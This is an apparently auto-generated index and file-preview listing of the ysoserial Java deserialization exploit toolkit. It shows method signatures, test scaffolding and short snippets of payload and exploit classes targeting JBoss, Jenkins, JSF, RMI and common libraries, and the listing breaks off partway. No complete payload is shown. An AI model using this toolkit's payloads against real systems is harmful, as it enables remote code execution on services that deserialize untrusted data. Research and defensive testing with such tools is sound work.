method getDependencies (line 15) | public static String[] getDependencies(AnnotatedElement annotated) {
method getDependenciesSimple (line 24) | public static String[] getDependenciesSimple(AnnotatedElement annotate...
FILE: src/main/java/ysoserial/payloads/util/ClassFiles.java
class ClassFiles (line 7) | public class ClassFiles {
method classAsFile (line 8) | public static String classAsFile(final Class<?> clazz) {
method classAsFile (line 12) | public static String classAsFile(final Class<?> clazz, boolean suffix) {
method classAsBytes (line 25) | public static byte[] classAsBytes(final Class<?> clazz) {
FILE: src/main/java/ysoserial/payloads/util/Gadgets.java
class Gadgets (line 32) | @SuppressWarnings ( {
class StubTransletPayload (line 47) | public static class StubTransletPayload extends AbstractTranslet imple...
method transform (line 52) | public void transform ( DOM document, SerializationHandler[] handler...
method transform (line 55) | @Override
class Foo (line 60) | public static class Foo implements Serializable {
method createMemoitizedProxy (line 66) | public static <T> T createMemoitizedProxy ( final Map<String, Object> ...
method createMemoizedInvocationHandler (line 71) | public static InvocationHandler createMemoizedInvocationHandler ( fina...
method createProxy (line 76) | public static <T> T createProxy ( final InvocationHandler ih, final Cl...
method createMap (line 86) | public static Map<String, Object> createMap ( final String key, final ...
method createTemplatesImpl (line 93) | public static Object createTemplatesImpl ( final String command ) thro...
method createTemplatesImpl (line 106) | public static <T> T createTemplatesImpl ( final String command, Class<...
method makeMap (line 140) | public static HashMap makeMap ( Object v1, Object v2 ) throws Exceptio...
FILE: src/main/java/ysoserial/payloads/util/JavaVersion.java
class JavaVersion (line 8) | public class JavaVersion {
method getLocalVersion (line 17) | public static JavaVersion getLocalVersion() {
method isAnnInvHUniversalMethodImpl (line 31) | public static boolean isAnnInvHUniversalMethodImpl() {
method isBadAttrValExcReadObj (line 36) | public static boolean isBadAttrValExcReadObj() {
method isAtLeast (line 41) | public static boolean isAtLeast(int major) {
FILE: src/main/java/ysoserial/payloads/util/PayloadRunner.java
class PayloadRunner (line 16) | @SuppressWarnings("unused")
method run (line 19) | public static void run(final Class<? extends ObjectPayload<?>> clazz, ...
method getDefaultTestCmd (line 45) | private static String getDefaultTestCmd() {
method getFirstExistingFile (line 54) | private static String getFirstExistingFile(String ... files) {
FILE: src/main/java/ysoserial/payloads/util/Reflections.java
class Reflections (line 12) | @SuppressWarnings ( "restriction" )
method setAccessible (line 15) | public static void setAccessible(AccessibleObject member) {
method getField (line 30) | public static Field getField(final Class<?> clazz, final String fieldN...
method setFieldValue (line 43) | public static void setFieldValue(final Object obj, final String fieldN...
method getFieldValue (line 48) | public static Object getFieldValue(final Object obj, final String fiel...
method getFirstCtor (line 53) | public static Constructor<?> getFirstCtor(final String name) throws Ex...
method newInstance (line 59) | public static Object newInstance(String className, Object ... args) th...
method createWithoutConstructor (line 63) | public static <T> T createWithoutConstructor ( Class<T> classToInstant...
method createWithConstructor (line 68) | @SuppressWarnings ( {"unchecked"} )
FILE: src/main/java/ysoserial/secmgr/DelegateSecurityManager.java
class DelegateSecurityManager (line 7) | @SuppressWarnings({"deprecation"})
method getSecurityManager (line 11) | public SecurityManager getSecurityManager() {
method setSecurityManager (line 15) | public void setSecurityManager(SecurityManager securityManager) {
method getInCheck (line 21) | @SuppressWarnings({"deprecation"})
method checkTopLevelWindow (line 28) | @SuppressWarnings({"deprecation"})
method checkSystemClipboardAccess (line 35) | @SuppressWarnings({"deprecation"})
method checkAwtEventQueueAccess (line 41) | @SuppressWarnings({"deprecation"})
method checkMemberAccess (line 47) | @SuppressWarnings({"deprecation"})
method getSecurityContext (line 55) | @Override
method checkPermission (line 60) | @Override
method checkPermission (line 65) | @Override
method checkCreateClassLoader (line 70) | @Override
method checkAccess (line 75) | @Override
method checkAccess (line 80) | @Override
method checkExit (line 85) | @Override
method checkExec (line 90) | @Override
method checkLink (line 95) | @Override
method checkRead (line 100) | @Override
method checkRead (line 105) | @Override
method checkRead (line 110) | @Override
method checkWrite (line 115) | @Override
method checkWrite (line 120) | @Override
method checkDelete (line 125) | @Override
method checkConnect (line 130) | @Override
method checkConnect (line 135) | @Override
method checkListen (line 140) | @Override
method checkAccept (line 145) | @Override
method checkMulticast (line 150) | @Override
method checkMulticast (line 155) | @SuppressWarnings({"deprecation"})
method checkPropertiesAccess (line 161) | @Override
method checkPropertyAccess (line 166) | @Override
method checkPrintJobAccess (line 171) | @Override
method checkPackageAccess (line 176) | @Override
method checkPackageDefinition (line 182) | @Override
method checkSetFactory (line 187) | @Override
method checkSecurityAccess (line 192) | @Override
method getThreadGroup (line 197) | @Override
FILE: src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java
class ExecCheckingSecurityManager (line 10) | public class ExecCheckingSecurityManager extends SecurityManager {
method ExecCheckingSecurityManager (line 11) | public ExecCheckingSecurityManager() {
method ExecCheckingSecurityManager (line 15) | public ExecCheckingSecurityManager(boolean throwException) {
method getCmds (line 23) | public List<String> getCmds() {
method checkPermission (line 27) | @Override
method checkPermission (line 30) | @Override
method checkExec (line 33) | @Override
class ExecException (line 45) | @SuppressWarnings("serial")
method ExecException (line 49) | public ExecException(String cmd) { this.cmd = cmd; }
method getCmd (line 50) | public String getCmd() { return cmd; }
method getThreadName (line 51) | public String getThreadName() { return threadName; }
method getMessage (line 52) | @
method callWrapped (line 59) | public void callWrapped(final Runnable runnable) throws Exception {
method callWrapped (line 68) | public <T> T callWrapped(final Callable<T> callable) throws Exception {
FILE: src/test/java/ysoserial/CiTest.java
class CiTest (line 5) | public class CiTest {
method test (line 6) | @Test
FILE: src/test/java/ysoserial/test/CustomDeserializer.java
type CustomDeserializer (line 8) | public interface CustomDeserializer {
method getCustomDeserializer (line 11) | Class<?> getCustomDeserializer ();
FILE: src/test/java/ysoserial/test/CustomPayloadArgs.java
type CustomPayloadArgs (line 8) | public interface CustomPayloadArgs {
method getPayloadArgs (line 11) | String getPayloadArgs ();
FILE: src/test/java/ysoserial/test/CustomTest.java
type CustomTest (line 9) | public interface CustomTest extends CustomPayloadArgs {
method run (line 11) | void run (Callable<Object> payload) throws Exception;
FILE: src/test/java/ysoserial/test/WrappedTest.java
type WrappedTest (line 9) | public interface WrappedTest extends CustomPayloadArgs {
method createCallable (line 11) | Callable<Object> createCallable ( Callable<Object> innerCallable );
FILE: src/test/java/ysoserial/test/exploit/RMIRegistryExploitTest.java
class RMIRegistryExploitTest (line 7) | public class RMIRegistryExploitTest {
method createRegistry (line 8) | public static void createRegistry(int port) throws RemoteException {
method main (line 12) | public static void main(String[] args) throws RemoteException, Interru...
FILE: src/test/java/ysoserial/test/payloads/CommandExecTest.java
class CommandExecTest (line 12) | public class CommandExecTest implements CustomTest {
method run (line 16) | @Override
method getPayloadArgs (line 29) | @Override
FILE: src/test/java/ysoserial/test/payloads/FileUploadTest.java
class FileUploadTest (line 19) | public class FileUploadTest implements CustomTest {
method FileUploadTest (line 32) | public FileUploadTest () {
method run (line 43) | public synchronized void run ( Callable<Object> payload ) throws Excep...
method safeDeleteOnExit (line 74) | private static void safeDeleteOnExit(File f) {
method getPayloadArgs (line 84) | public String getPayloadArgs () {
FILE: src/test/java/ysoserial/test/payloads/JRMPReverseConnectSMTest.java
class JRMPReverseConnectSMTest (line 15) | public class JRMPReverseConnectSMTest extends RemoteClassLoadingTest imp...
method JRMPReverseConnectSMTest (line 20) | public JRMPReverseConnectSMTest (String command) {
method createCallable (line 35) | @Override
method getPayloadArgs (line 56) | @Override
FILE: src/test/java/ysoserial/test/payloads/JRMPReverseConnectTest.java
class JRMPReverseConnectTest (line 18) | public class JRMPReverseConnectTest implements CustomTest {
method JRMPReverseConnectTest (line 26) | public JRMPReverseConnectTest () {
method run (line 32) | public void run ( Callable<Object> payload ) throws Exception {
method getPayloadArgs (line 53) | public String getPayloadArgs () {
FILE: src/test/java/ysoserial/test/payloads/MyfacesTest.java
class MyfacesTest (line 35) | public class MyfacesTest extends RemoteClassLoadingTest implements Custo...
method MyfacesTest (line 38) | public MyfacesTest ( String command ) {
method getCustomDeserializer (line 44) | public Class<?> getCustomDeserializer () {
class MyfacesDeserializer (line 54) | public static final class MyfacesDeserializer extends Deserializer {
method getExtraDependencies (line 56) | public static Class<?>[] getExtraDependencies () {
class MockRequestContext (line 62) | private static class MockRequestContext implements Answer<Object> {
method answer (line 67) | public Object answer ( InvocationOnMock invocation ) throws Throwa...
class MockELResolver (line 82) | private static class MockELResolver extends ELResolver {
method MockELResolver (line 87) | public MockELResolver (ServletRequest req) {
method getValue (line 92) | @Override
method getType (line 103) | @Override
method setValue (line 113) | @Override
method isReadOnly (line 119) | @Override
method getFeatureDescriptors (line 125) | @Override
method getCommonPropertyType (line 131) | @Override
method MyfacesDeserializer (line 138) | public MyfacesDeserializer ( byte[] bytes ) {
method call (line 143) | @Override
method createMockFacesContext (line 161) | private static FacesContext createMockFacesContext () throws Malform...
FILE: src/test/java/ysoserial/test/payloads/PayloadsTest.java
class PayloadsTest (line 51) | @SuppressWarnings ( {
method payloads (line 57) | @Parameters ( name = "payloadClass: {0}" )
method PayloadsTest (line 67) | public PayloadsTest ( Class<? extends ObjectPayload<?>> payloadClass ) {
method testPayload (line 72) | @Test
method testPayload (line 78) | public static void testPayload ( final Class<? extends ObjectPayload<?...
method makeSerializeCallable (line 152) | private static Callable<byte[]> makeSerializeCallable ( final Class<? ...
method makeDeserializeCallable (line 166) | private static Callable<Object> makeDeserializeCallable ( PayloadTest ...
method checkPrecondition (line 177) | private static boolean checkPrecondition ( Class<? extends ObjectPaylo...
method buildDeps (line 184) | private static String[] buildDeps ( final Class<? extends ObjectPayloa...
method deserializeWithDependencies (line 201) | static Object deserializeWithDependencies ( byte[] serialized, final S...
method main (line 255) | public static void main(String[] args) {
class StdIo (line 264) | public static class StdIo {
method restoreStreams (line 269) | public static void restoreStreams() {
method setStreams (line 273) | public static void setStreams(PrintStream out, PrintStream err) {
method setStreams (line 278) | public static void setStreams(OutputStream out, OutputStream err) {
class PayloadListener (line 283) | public static class PayloadListener extends RunListener {
type Status (line 284) | public enum Status {
method testStarted (line 298) | @Override
method testFinished (line 313) | @Override
method testFailure (line 325) | @Override
method testAssumptionFailure (line 331) | @Override
method getPayload (line 338) | public static String getPayload(String displayName) {
FILE: src/test/java/ysoserial/test/payloads/RemoteClassLoadingTest.java
class RemoteClassLoadingTest (line 22) | public class RemoteClassLoadingTest implements WrappedTest {
method RemoteClassLoadingTest (line 28) | public RemoteClassLoadingTest ( String command ) {
method getPayloadArgs (line 35) | public String getPayloadArgs () {
method getHTTPPort (line 39) | public int getHTTPPort () {
method createCallable (line 43) | public Callable<Object> createCallable ( Callable<Object> innerCallabl...
method getExploitClassName (line 47) | public String getExploitClassName () {
method makePayloadClass (line 51) | protected byte[] makePayloadClass () {
class RemoteClassLoadingTestCallable (line 66) | static class RemoteClassLoadingTestCallable extends NanoHTTPD implemen...
method RemoteClassLoadingTestCallable (line 73) | public RemoteClassLoadingTestCallable ( int port, byte[] data, Calla...
method waitFor (line 81) | public void waitFor() throws InterruptedException {
method call (line 88) | public Object call () throws Exception {
method setup (line 102) | private void setup () throws IOException {
method cleanup (line 107) | private void cleanup () {
method serve (line 112) | @Override
class Exploit (line 126) | public static class Exploit implements Serializable {
FILE: src/test/java/ysoserial/test/payloads/TestHarnessTest.java
class TestHarnessTest (line 12) | public class TestHarnessTest {
method testHarnessExecFail (line 14) | @Test
method testHarnessClassLoaderFail (line 26) | @Test
method testHarnessExecPass (line 37) | @Test
class ExecMockPayload (line 42) | public static class ExecMockPayload implements ObjectPayload<ExecMockS...
method getObject (line 43) | public ExecMockSerializable getObject(String command) throws Excepti...
class NoopMockPayload (line 48) | public static class NoopMockPayload implements ObjectPayload<Integer> {
method getObject (line 49) | public Integer getObject(String command) throws Exception {
class ExecMockSerializable (line 54) | @SuppressWarnings("serial")
method ExecMockSerializable (line 57) | public ExecMockSerializable(String cmd) { this.cmd = cmd; }
method readObject (line 59) | private void readObject(final ObjectInputStream ois) throws IOExcept...
FILE: src/test/java/ysoserial/test/util/Callables.java
class Callables (line 5) | public class Callables {
type BeforeAfterCallback (line 6) | public static interface BeforeAfterCallback {
method before (line 7) | public void before();
method after (line 8) | public void after();
class Wrapper (line 11) | public static class Wrapper<T> implements Callable<T> {
method Wrapper (line 15) | public Wrapper(Callable<T> callable, BeforeAfterCallback callback) {
method call (line 20) | @Override
method wrap (line 31) | public static <T> Callable<T> wrap(Callable<T> callable, BeforeAfterCa...
FILE: src/test/java/ysoserial/test/util/Files.java
class Files (line 5) | public class Files {
method waitForFile (line 6) | public static void waitForFile(File file, int timeoutMs) throws Interr...
FILE: src/test/java/ysoserial/test/util/GadgetsTest.java
class GadgetsTest (line 6) | public class GadgetsTest {
method test_createTemplatesImpl_noCompilationError (line 7) | @Test
FILE: src/test/java/ysoserial/test/util/OS.java
type OS (line 3) | public enum OS {
method get (line 11) | public static OS get() {
method determineOs (line 15) | private static OS determineOs() {
method getTmpDir (line 28) | public static String getTmpDir() {
FILE: src/test/java/ysoserial/test/util/Throwables.java
class Throwables (line 3) | public class Throwables {
method getInnermostCause (line 4) | public static Throwable getInnermostCause(final Throwable t) {
Condensed preview — 91 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (281K chars).
[
{
"path": ".editorconfig",
"chars": 201,
"preview": "root = true\n\n[*]\nend_of_line = lf\ncharset = utf-8\ntrim_trailing_whitespace = true\ninsert_final_newline = true\nindent_sty"
},
{
"path": ".github/workflows/publish.yml",
"chars": 1031,
"preview": "name: publish jar\non:\n push:\n tags:\n - \"v*.*.*\"\npermissions:\n contents: write\n\njobs:\n publish:\n runs-on: u"
},
{
"path": ".gitignore",
"chars": 110,
"preview": "# java\n*.class\n\n# mvn\ntarget/\n\n# eclipse\n.classpath\n.project\n.settings/\n\n# idea\n.idea/\n*.iml\n\n# tests\npwntest\n"
},
{
"path": ".travis.yml",
"chars": 1286,
"preview": "dist: trusty\nlanguage: java\n\ncache:\n directories:\n - $HOME/.m2\n - $HOME/.mvn/\n\n# jdk6 requires workarounds https://gi"
},
{
"path": "DISCLAIMER.txt",
"chars": 327,
"preview": "DISCLAIMER\n\nThis software has been created purely for the purposes of academic research and\nfor the development of effec"
},
{
"path": "Dockerfile",
"chars": 424,
"preview": "FROM maven:3.5-jdk-8 as builder\n\nWORKDIR /app\n\n# download artifacts\nCOPY pom.xml .\nCOPY assembly.xml .\nRUN mvn dependenc"
},
{
"path": "LICENSE.txt",
"chars": 1069,
"preview": "Copyright (c) 2013 Chris Frohoff\n\nMIT License\n\nPermission is hereby granted, free of charge, to any person obtaining\na c"
},
{
"path": "README.md",
"chars": 7462,
"preview": "\n# ysoserial\n\n[](https://github"
},
{
"path": "appveyor.yml",
"chars": 1078,
"preview": "# based on https://github.com/GoogleCloudPlatform/google-cloud-java/blob/master/appveyor.yml\n\n# build version\nversion: '"
},
{
"path": "assembly.xml",
"chars": 1047,
"preview": "<assembly\n xmlns=\"http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.3\"\n xmlns:xsi=\"http://www.w3."
},
{
"path": "pom.xml",
"chars": 12230,
"preview": "<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n\txsi:schemaLoca"
},
{
"path": "src/main/java/ysoserial/Deserializer.java",
"chars": 1080,
"preview": "package ysoserial;\n\nimport java.io.ByteArrayInputStream;\nimport java.io.File;\nimport java.io.FileInputStream;\nimport jav"
},
{
"path": "src/main/java/ysoserial/GeneratePayload.java",
"chars": 2549,
"preview": "package ysoserial;\n\nimport java.io.PrintStream;\nimport java.util.*;\n\nimport ysoserial.payloads.ObjectPayload;\nimport yso"
},
{
"path": "src/main/java/ysoserial/Serializer.java",
"chars": 791,
"preview": "package ysoserial;\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.IOException;\nimport java.io.ObjectOutputStream;"
},
{
"path": "src/main/java/ysoserial/Strings.java",
"chars": 1935,
"preview": "package ysoserial;\n\nimport org.apache.commons.lang.StringUtils;\n\nimport java.util.Arrays;\nimport java.util.Comparator;\ni"
},
{
"path": "src/main/java/ysoserial/exploit/JBoss.java",
"chars": 15295,
"preview": "package ysoserial.exploit;\n\n\nimport java.io.IOException;\nimport java.lang.reflect.InvocationTargetException;\nimport java"
},
{
"path": "src/main/java/ysoserial/exploit/JMXInvokeMBean.java",
"chars": 1435,
"preview": "package ysoserial.exploit;\n\nimport javax.management.MBeanServerConnection;\nimport javax.management.ObjectName;\nimport ja"
},
{
"path": "src/main/java/ysoserial/exploit/JRMPClassLoadingListener.java",
"chars": 1639,
"preview": "package ysoserial.exploit;\n\n\n\nimport java.net.URL;\n\n\n/**\n * JRMP listener triggering RMI remote classloading\n * \n * Open"
},
{
"path": "src/main/java/ysoserial/exploit/JRMPClient.java",
"chars": 4180,
"preview": "package ysoserial.exploit;\n\n\nimport java.io.DataOutputStream;\nimport java.io.IOException;\nimport java.io.ObjectOutputStr"
},
{
"path": "src/main/java/ysoserial/exploit/JRMPListener.java",
"chars": 10103,
"preview": "package ysoserial.exploit;\n\n\nimport java.io.BufferedInputStream;\nimport java.io.BufferedOutputStream;\nimport java.io.Dat"
},
{
"path": "src/main/java/ysoserial/exploit/JSF.java",
"chars": 2458,
"preview": "package ysoserial.exploit;\n\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.ObjectOutputStream;\nimport java.io.Out"
},
{
"path": "src/main/java/ysoserial/exploit/JenkinsCLI.java",
"chars": 4601,
"preview": "package ysoserial.exploit;\n\nimport java.io.DataOutputStream;\nimport java.io.IOException;\nimport java.io.OutputStream;\nim"
},
{
"path": "src/main/java/ysoserial/exploit/JenkinsListener.java",
"chars": 7658,
"preview": "package ysoserial.exploit;\n\n\nimport java.io.DataOutputStream;\nimport java.io.IOException;\nimport java.io.ObjectOutputStr"
},
{
"path": "src/main/java/ysoserial/exploit/JenkinsReverse.java",
"chars": 2477,
"preview": "package ysoserial.exploit;\n\n\nimport java.io.IOException;\nimport java.net.InetSocketAddress;\nimport java.rmi.registry.Reg"
},
{
"path": "src/main/java/ysoserial/exploit/RMIRegistryExploit.java",
"chars": 3480,
"preview": "package ysoserial.exploit;\n\nimport java.io.IOException;\nimport java.net.Socket;\nimport java.rmi.ConnectIOException;\nimpo"
},
{
"path": "src/main/java/ysoserial/payloads/AspectJWeaver.java",
"chars": 3744,
"preview": "package ysoserial.payloads;\n\nimport org.apache.commons.codec.binary.Base64;\nimport org.apache.commons.collections.Transf"
},
{
"path": "src/main/java/ysoserial/payloads/BeanShell1.java",
"chars": 2183,
"preview": "package ysoserial.payloads;\n\nimport bsh.Interpreter;\nimport bsh.XThis;\n\nimport java.lang.reflect.InvocationHandler;\nimpo"
},
{
"path": "src/main/java/ysoserial/payloads/C3P0.java",
"chars": 3065,
"preview": "package ysoserial.payloads;\n\n\nimport java.io.PrintWriter;\nimport java.sql.SQLException;\nimport java.sql.SQLFeatureNotSup"
},
{
"path": "src/main/java/ysoserial/payloads/Click1.java",
"chars": 3154,
"preview": "package ysoserial.payloads;\n\nimport org.apache.click.control.Column;\nimport org.apache.click.control.Table;\nimport ysose"
},
{
"path": "src/main/java/ysoserial/payloads/Clojure.java",
"chars": 2393,
"preview": "package ysoserial.payloads;\n\nimport clojure.inspector.proxy$javax.swing.table.AbstractTableModel$ff19274a;\nimport clojur"
},
{
"path": "src/main/java/ysoserial/payloads/CommonsBeanutils1.java",
"chars": 1568,
"preview": "package ysoserial.payloads;\n\nimport java.math.BigInteger;\nimport java.util.PriorityQueue;\n\nimport org.apache.commons.bea"
},
{
"path": "src/main/java/ysoserial/payloads/CommonsCollections1.java",
"chars": 3067,
"preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.InvocationHandler;\nimport java.util.HashMap;\nimport java.util.Map;"
},
{
"path": "src/main/java/ysoserial/payloads/CommonsCollections2.java",
"chars": 1827,
"preview": "package ysoserial.payloads;\n\nimport java.util.PriorityQueue;\nimport java.util.Queue;\n\nimport org.apache.commons.collecti"
},
{
"path": "src/main/java/ysoserial/payloads/CommonsCollections3.java",
"chars": 2440,
"preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.InvocationHandler;\nimport java.util.HashMap;\nimport java.util.Map;"
},
{
"path": "src/main/java/ysoserial/payloads/CommonsCollections4.java",
"chars": 2268,
"preview": "package ysoserial.payloads;\n\nimport java.util.PriorityQueue;\nimport java.util.Queue;\n\nimport javax.xml.transform.Templat"
},
{
"path": "src/main/java/ysoserial/payloads/CommonsCollections5.java",
"chars": 3815,
"preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.Field;\nimport java.lang.reflect.InvocationHandler;\nimport java.uti"
},
{
"path": "src/main/java/ysoserial/payloads/CommonsCollections6.java",
"chars": 4023,
"preview": "package ysoserial.payloads;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.fu"
},
{
"path": "src/main/java/ysoserial/payloads/CommonsCollections7.java",
"chars": 3313,
"preview": "package ysoserial.payloads;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.fu"
},
{
"path": "src/main/java/ysoserial/payloads/DynamicDependencies.java",
"chars": 103,
"preview": "package ysoserial.payloads;\n\n\n/**\n * @author mbechler\n *\n */\npublic interface DynamicDependencies {\n\n}\n"
},
{
"path": "src/main/java/ysoserial/payloads/FileUpload1.java",
"chars": 4706,
"preview": "package ysoserial.payloads;\n\n\nimport java.io.File;\nimport java.io.IOException;\nimport java.io.OutputStream;\nimport java."
},
{
"path": "src/main/java/ysoserial/payloads/Groovy1.java",
"chars": 1325,
"preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.InvocationHandler;\nimport java.util.Map;\n\nimport org.codehaus.groo"
},
{
"path": "src/main/java/ysoserial/payloads/Hibernate1.java",
"chars": 8552,
"preview": "package ysoserial.payloads;\n\n\nimport java.lang.reflect.Array;\nimport java.lang.reflect.Constructor;\nimport java.lang.ref"
},
{
"path": "src/main/java/ysoserial/payloads/Hibernate2.java",
"chars": 2079,
"preview": "package ysoserial.payloads;\n\n\nimport ysoserial.payloads.annotation.Authors;\nimport ysoserial.payloads.annotation.Payload"
},
{
"path": "src/main/java/ysoserial/payloads/JBossInterceptors1.java",
"chars": 4156,
"preview": "package ysoserial.payloads;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport org.jboss.interce"
},
{
"path": "src/main/java/ysoserial/payloads/JRMPClient.java",
"chars": 2689,
"preview": "package ysoserial.payloads;\n\n\nimport java.lang.reflect.Proxy;\nimport java.rmi.registry.Registry;\nimport java.rmi.server."
},
{
"path": "src/main/java/ysoserial/payloads/JRMPListener.java",
"chars": 1861,
"preview": "package ysoserial.payloads;\n\n\nimport java.rmi.server.RemoteObject;\nimport java.rmi.server.RemoteRef;\nimport java.rmi.ser"
},
{
"path": "src/main/java/ysoserial/payloads/JSON1.java",
"chars": 5503,
"preview": "package ysoserial.payloads;\n\n\nimport ysoserial.payloads.annotation.Authors;\nimport ysoserial.payloads.annotation.Depende"
},
{
"path": "src/main/java/ysoserial/payloads/JavassistWeld1.java",
"chars": 4213,
"preview": "package ysoserial.payloads;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport org.jboss.weld.in"
},
{
"path": "src/main/java/ysoserial/payloads/Jdk7u21.java",
"chars": 3074,
"preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.InvocationHandler;\nimport java.util.HashMap;\nimport java.util.Link"
},
{
"path": "src/main/java/ysoserial/payloads/Jython1.java",
"chars": 4599,
"preview": "package ysoserial.payloads;\n\nimport org.apache.commons.io.FileUtils;\nimport org.python.core.*;\n\nimport java.math.BigInte"
},
{
"path": "src/main/java/ysoserial/payloads/MozillaRhino1.java",
"chars": 3427,
"preview": "package ysoserial.payloads;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport org.mozilla.javas"
},
{
"path": "src/main/java/ysoserial/payloads/MozillaRhino2.java",
"chars": 4892,
"preview": "package ysoserial.payloads;\n\nimport org.mozilla.javascript.*;\nimport org.mozilla.javascript.tools.shell.Environment;\nimp"
},
{
"path": "src/main/java/ysoserial/payloads/Myfaces1.java",
"chars": 3858,
"preview": "package ysoserial.payloads;\n\n\n\nimport javax.el.ELContext;\nimport javax.el.ExpressionFactory;\nimport javax.el.ValueExpres"
},
{
"path": "src/main/java/ysoserial/payloads/Myfaces2.java",
"chars": 2434,
"preview": "package ysoserial.payloads;\n\n\n\nimport ysoserial.payloads.annotation.Authors;\nimport ysoserial.payloads.annotation.Payloa"
},
{
"path": "src/main/java/ysoserial/payloads/ObjectPayload.java",
"chars": 3813,
"preview": "package ysoserial.payloads;\n\n\nimport java.lang.reflect.Modifier;\nimport java.util.Iterator;\nimport java.util.Set;\n\nimpor"
},
{
"path": "src/main/java/ysoserial/payloads/ROME.java",
"chars": 1354,
"preview": "package ysoserial.payloads;\n\n\nimport javax.xml.transform.Templates;\n\nimport com.sun.syndication.feed.impl.ObjectBean;\n\ni"
},
{
"path": "src/main/java/ysoserial/payloads/ReleaseableObjectPayload.java",
"chars": 180,
"preview": "package ysoserial.payloads;\n\n\n/**\n * @author mbechler\n *\n */\npublic interface ReleaseableObjectPayload<T> extends Object"
},
{
"path": "src/main/java/ysoserial/payloads/Spring1.java",
"chars": 3203,
"preview": "package ysoserial.payloads;\n\nimport static java.lang.Class.forName;\n\nimport java.lang.reflect.Constructor;\nimport java.l"
},
{
"path": "src/main/java/ysoserial/payloads/Spring2.java",
"chars": 2774,
"preview": "package ysoserial.payloads;\n\n\nimport static java.lang.Class.forName;\n\nimport java.lang.reflect.InvocationHandler;\nimport"
},
{
"path": "src/main/java/ysoserial/payloads/URLDNS.java",
"chars": 3523,
"preview": "package ysoserial.payloads;\n\nimport java.io.IOException;\nimport java.net.InetAddress;\nimport java.net.URLConnection;\nimp"
},
{
"path": "src/main/java/ysoserial/payloads/Vaadin1.java",
"chars": 3610,
"preview": "package ysoserial.payloads;\n\nimport javax.management.BadAttributeValueExpException;\n\nimport com.vaadin.data.util.NestedM"
},
{
"path": "src/main/java/ysoserial/payloads/Wicket1.java",
"chars": 4707,
"preview": "package ysoserial.payloads;\n\n\nimport java.io.File;\nimport java.io.IOException;\nimport java.io.OutputStream;\nimport java."
},
{
"path": "src/main/java/ysoserial/payloads/annotation/Authors.java",
"chars": 1327,
"preview": "package ysoserial.payloads.annotation;\n\nimport java.lang.annotation.ElementType;\nimport java.lang.annotation.Retention;\n"
},
{
"path": "src/main/java/ysoserial/payloads/annotation/Dependencies.java",
"chars": 993,
"preview": "package ysoserial.payloads.annotation;\n\nimport java.lang.annotation.ElementType;\nimport java.lang.annotation.Retention;\n"
},
{
"path": "src/main/java/ysoserial/payloads/annotation/PayloadTest.java",
"chars": 361,
"preview": "package ysoserial.payloads.annotation;\n\nimport java.lang.annotation.Retention;\nimport java.lang.annotation.RetentionPoli"
},
{
"path": "src/main/java/ysoserial/payloads/util/ClassFiles.java",
"chars": 1174,
"preview": "package ysoserial.payloads.util;\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.IOException;\nimport java.io.Input"
},
{
"path": "src/main/java/ysoserial/payloads/util/Gadgets.java",
"chars": 6492,
"preview": "package ysoserial.payloads.util;\n\n\nimport static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_"
},
{
"path": "src/main/java/ysoserial/payloads/util/JavaVersion.java",
"chars": 1255,
"preview": "package ysoserial.payloads.util;\n\n\n/**\n * @author mbechler\n *\n */\npublic class JavaVersion {\n\n\n public int major;\n "
},
{
"path": "src/main/java/ysoserial/payloads/util/PayloadRunner.java",
"chars": 2079,
"preview": "package ysoserial.payloads.util;\n\nimport java.util.concurrent.Callable;\n\nimport ysoserial.Deserializer;\nimport ysoserial"
},
{
"path": "src/main/java/ysoserial/payloads/util/Reflections.java",
"chars": 3051,
"preview": "package ysoserial.payloads.util;\n\nimport java.lang.reflect.AccessibleObject;\nimport java.lang.reflect.Constructor;\nimpor"
},
{
"path": "src/main/java/ysoserial/secmgr/DelegateSecurityManager.java",
"chars": 4522,
"preview": "package ysoserial.secmgr;\n\nimport java.io.FileDescriptor;\nimport java.net.InetAddress;\nimport java.security.Permission;\n"
},
{
"path": "src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java",
"chars": 2268,
"preview": "package ysoserial.secmgr;\n\nimport java.security.Permission;\nimport java.util.Collections;\nimport java.util.LinkedList;\ni"
},
{
"path": "src/test/java/ysoserial/CiTest.java",
"chars": 257,
"preview": "package ysoserial;\n\nimport org.junit.Test;\n\npublic class CiTest {\n @Test\n public void test() {\n System.out."
},
{
"path": "src/test/java/ysoserial/test/CustomDeserializer.java",
"chars": 139,
"preview": "package ysoserial.test;\n\n\n/**\n * @author mbechler\n *\n */\npublic interface CustomDeserializer {\n\n\n Class<?> getCustomD"
},
{
"path": "src/test/java/ysoserial/test/CustomPayloadArgs.java",
"chars": 129,
"preview": "package ysoserial.test;\n\n\n/**\n * @author mbechler\n *\n */\npublic interface CustomPayloadArgs {\n\n\n String getPayloadArg"
},
{
"path": "src/test/java/ysoserial/test/CustomTest.java",
"chars": 212,
"preview": "package ysoserial.test;\n\nimport java.util.concurrent.Callable;\n\n/**\n * @author mbechler\n *\n */\npublic interface CustomTe"
},
{
"path": "src/test/java/ysoserial/test/WrappedTest.java",
"chars": 228,
"preview": "package ysoserial.test;\n\nimport java.util.concurrent.Callable;\n\n/**\n * @author mbechler\n *\n */\npublic interface WrappedT"
},
{
"path": "src/test/java/ysoserial/test/exploit/RMIRegistryExploitTest.java",
"chars": 579,
"preview": "package ysoserial.test.exploit;\n\nimport java.rmi.RemoteException;\nimport java.rmi.registry.LocateRegistry;\nimport java.r"
},
{
